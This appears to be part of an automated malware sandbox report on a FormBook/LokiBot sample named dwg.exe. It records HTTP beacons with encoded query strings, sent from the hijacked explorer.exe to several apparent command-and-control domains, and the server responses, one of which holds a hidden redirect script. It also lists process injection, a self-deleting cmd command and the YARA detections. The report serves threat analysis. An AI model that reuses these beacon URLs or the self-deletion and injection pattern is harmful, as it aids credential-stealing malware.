a0 61 bf 42 fa 67 f5 2c e7 36 65 fe 1e 93 5a 07 8d 9b 0f 46 13 8e 39 b3 fb ac 3b 77 ea e0 ef ba a0 6b c4 10 59 f4 f0 8e 6c 78 98 6c ef 77 0a 7c e5 f7 d6 f5 81 ad 60 37 43 75 e6 6a 66 0e ee 87 fd 6a 92 86 19 90 b6 38 c8 22 f5 6c 0b 03 c2 2d b9 49 fc cb b2 cd d9 ad ac fe 2b 9a 53 f7 eb 14 4c c2 df 07 0b c3 7f 24 93 e1 4c 2a fb ca 9d aa 75 7d 6a ec 31 46 b6 0a cb 98 be ce 06 79 12 f3 ff fe 5f e7 e8 7e 29 37 1f 62 04 ba 05 97 91 40 ed 65 8c 1c 2a a9 b0 00 df d7 1c 98 99 a5 14 f5 79 5f 03 41 3e 3c 0e 08 89 11 27 b7 fa 91 75 d7 89 83 15 d8 8f 6a 1b 36 1b 42 7f 65 e6 25 c1 db 5c 9f 45 2d 95 95 80 c9 91 41 74 0d 77 7a 49 6f a9 ed 06 4e e9 59 0c 41 e5 52 62 e9 5f 6d 16 09 d2 07 f0 03 ba b0 d4 a7 3f b3 81 e1 4d 8b 0d fd 06 8b 0d 21 c6 0d 71 ee 3b 9c 9f b4 39 2f fc 60 b4 42 7a 39 24 ed 93 af b2 90 07 6a 98 ff 54 74 e2 99 92 dc 11 1e 12 47 e1 ed de 85 0e 91 88 bc bf 9d 34 24 b4 cc a9 a4 71 05 15 7b 5c 66 a3 98 32 2b aa ee b3 98 a5 35 56 e8 25 11 85 c5 d7 22 b4 2d 9c b3 17 bf cc 14 8e 94 1c 76 f1 1d 37 64 5f 97 dd b2 47 d0 89 ac 21 8e 7e 74 19 b9 d7 d2 45 be a6 c9 1e c9 9d 68 f2 8f 12 01 4a 29 4a ae db 58 2b 69 a1 71 b1 49 21 d8 9e f2 70 c9 1b c6 cf 4e 8e 62 79 9c db 32 80 3c fd 38 cc d9 9e 4e 5d 60 74 1f 2a 10 bf 27 0b c7 50 f3 e7 f1 85 68 03 f7 29 ba 21 e0 1c 4e 38 5f 79 ba 25 9e 06 67 9d 36 ce ea ef 37 ec 42 40 8d d1 b8 d2 fb ba 19 91 a0 01 43 42 f6 d3 55 6f 28 c8 7d 06 f8 c1 9d a1 6c 85 be 65 8c bc 08 a7 11 74 33 22 9c f4 69 a1 fd 64 6f 43 48 67 59 3a 9b da 41 e7 87 f8 79 40 65 4b 14 fb 0a 95 4f 21 86 cd 52 55 51 08 34 81 46 11 b5 94 94 76 b0 f5 07 d4 e5 5f 95 9a 52 e9 fc 0b 83 fe 6a 82 e4 79 60 22 5b 77 f2 ac f4 bb 03 b4 f6 46 cd ba d3 5a 7f b8 1d b2 8e 25 4e 01 54 92 d6 c3 36 73 1f b3 6a ef a6 9f e5 26 f5 6e bf 6c 6c a8 dd cb 0b cb a4 9a 20 ec 07 7c a7 dc f2 28 5a 12 85 43 b9 64 bc c6 27 7d 4b 16 1d 32 40
                                                              Data Ascii: [0GUmyuQ*DFA;2XvWp&#CCB{*lL"idoCHgY:Ay@eKO!uRUQ+;HYWK!yYC5f34_RH!e1<WjPLJ/BDK`<r#}.&p\x*D[HG4-BO~&;1sPLo6{&yHy1zH[mtd6u'Uy??NgqE\Ln8OaZekaAZ:rd&dzfFt?FL5O<PVa-Z:=Dq!(s&{OiT;y&caBg,6eZF9;wkYlxlw|`7Cujfj8"l-I+SL$L*u}j1Fy_~)7b@e*y_A><'uj6Be%\E-AtwzIoNYARb_m?M!q;9/`Bz9$jTtG4$q{\f2+5V%"-v7d_G!~tEhJ)JX+iqI!pNby2<8N]`t*'Ph)!N8_y%g67B@CBUo(}let3"idoCHgY:Ay@eKO!RUQ4Fv_Rjy`"[wFZ%NT6sj&nll |(ZCd'}K2@


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.349726104.18.194.2080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:54:57.474004984 CET1531OUTGET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1
                                                              Host: www.hamiltonparkpdx.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:54:57.525089979 CET1531INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 24 Feb 2021 08:54:57 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Wed, 24 Feb 2021 09:54:57 GMT
                                                              Location: https://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1
                                                              cf-request-id: 0874d8b4e300004a7932305000000001
                                                              Server: cloudflare
                                                              CF-RAY: 6267f701696e4a79-FRA
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.349733142.250.185.17980C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:02.684974909 CET1625OUTGET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
                                                              Host: www.readingqueens.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:02.847496986 CET1662INHTTP/1.1 301 Moved Permanently
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Wed, 24 Feb 2021 08:55:02 GMT
                                                              Location: https://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.3497383.223.115.18580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:18.232908964 CET5104OUTGET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
                                                              Host: www.winningscotland.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:18.360658884 CET5104INHTTP/1.1 302 Found
                                                              Cache-Control: private
                                                              Content-Type: text/html; charset=utf-8
                                                              Location: https://www.hugedomains.com/domain_profile.cfm?d=winningscotland&e=com
                                                              Server: Microsoft-IIS/8.5
                                                              X-Powered-By: ASP.NET
                                                              Date: Wed, 24 Feb 2021 08:54:55 GMT
                                                              Connection: close
                                                              Content-Length: 191
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 77 69 6e 6e 69 6e 67 73 63 6f 74 6c 61 6e 64 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=winningscotland&amp;e=com">here</a>.</h2></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.34973934.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:23.479542971 CET5106OUTGET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1
                                                              Host: www.kreatelymedia.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:23.618812084 CET5107INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Wed, 24 Feb 2021 08:55:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "6031584e-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.34974123.111.137.15480C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:29.009828091 CET5131OUTGET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1
                                                              Host: www.neuroacademyok.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:30.420865059 CET5140INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              WPO-Cache-Status: not cached
                                                              WPO-Cache-Message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              X-Redirect-By: WordPress
                                                              Location: http://neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb
                                                              Content-Length: 0
                                                              Date: Wed, 24 Feb 2021 08:55:30 GMT
                                                              Server: LiteSpeed
                                                              Vary: User-Agent,User-Agent


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.34974223.110.124.4380C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:34.966166973 CET5141OUTGET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1
                                                              Host: www.india-vspakistanlive.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:35.157524109 CET5142INHTTP/1.1 200 OK
                                                              Content-Type: text/html; charset=UTF-8
                                                              Server: Microsoft-IIS/8.5
                                                              X-Powered-By: ASP.NET
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: *
                                                              Access-Control-Allow-Methods: GET, POST
                                                              Date: Wed, 24 Feb 2021 08:55:25 GMT
                                                              Connection: close
                                                              Content-Length: 768
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e8 af b7 e7 a8 8d e7 ad 89 ef bc 8c e6 ad a3 e5 9c a8 e8 bf 9b e5 85 a5 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 7d 65 6c 73 65 20 7b 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 7d 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 20 20 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 68 61 70 70 78 7a 2e 63 6f 6d 2f 22 3e 20 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 27 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 20 68 74 74 70 3a 2f 2f 68 68 73 70 61 70 70 38 2e 63 6f 6d 2f 64 68 35 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3b 27 2c 20 33 30 30 30 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>...</title><script>(function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else { bp.src = 'http://push.zhanzhang.baidu.com/push.js';}var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);})();</script></head> <body><div style="display:none"><a href="http://www.hhappxz.com/"> </a></div><div style="display:none"><script>setTimeout('window.location=" http://hhspapp8.com/dh5/index.html";', 3000);</script></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              7192.168.2.349745192.0.78.2580C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 24, 2021 09:55:45.292023897 CET5179OUTGET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1
                                                              Host: www.bloomingintoyou.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 24, 2021 09:55:45.332649946 CET5180INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Wed, 24 Feb 2021 08:55:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV
                                                              X-ac: 2.hhn _dfw
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: dwg.exe PID: 6408 Parent PID: 5620

                                                              General

                                                              Start time:09:53:45
                                                              Start date:24/02/2021
                                                              Path:C:\Users\user\Desktop\dwg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                              Imagebase:0x400000
                                                              File size:98304 bytes
                                                              MD5 hash:92628CC54AD5D8FFED4F28F9BF9F80F8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Visual Basic
                                                              Reputation:low

                                                              Analysis Process: dwg.exe PID: 6696 Parent PID: 6408

                                                              General

                                                              Start time:09:53:57
                                                              Start date:24/02/2021
                                                              Path:C:\Users\user\Desktop\dwg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                              Imagebase:0x400000
                                                              File size:98304 bytes
                                                              MD5 hash:92628CC54AD5D8FFED4F28F9BF9F80F8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 6696

                                                              General

                                                              Start time:09:54:14
                                                              Start date:24/02/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:
                                                              Imagebase:0x7ff714890000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: cmmon32.exe PID: 2208 Parent PID: 3388

                                                              General

                                                              Start time:09:54:27
                                                              Start date:24/02/2021
                                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                              Imagebase:0x130000
                                                              File size:36864 bytes
                                                              MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, Author: Florian Roth
                                                              Reputation:moderate

                                                              Analysis Process: cmd.exe PID: 6612 Parent PID: 2208

                                                              General

                                                              Start time:09:54:32
                                                              Start date:24/02/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\dwg.exe'
                                                              Imagebase:0xad0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 6684 Parent PID: 6612

                                                              General

                                                              Start time:09:54:32
                                                              Start date:24/02/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6b2800000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >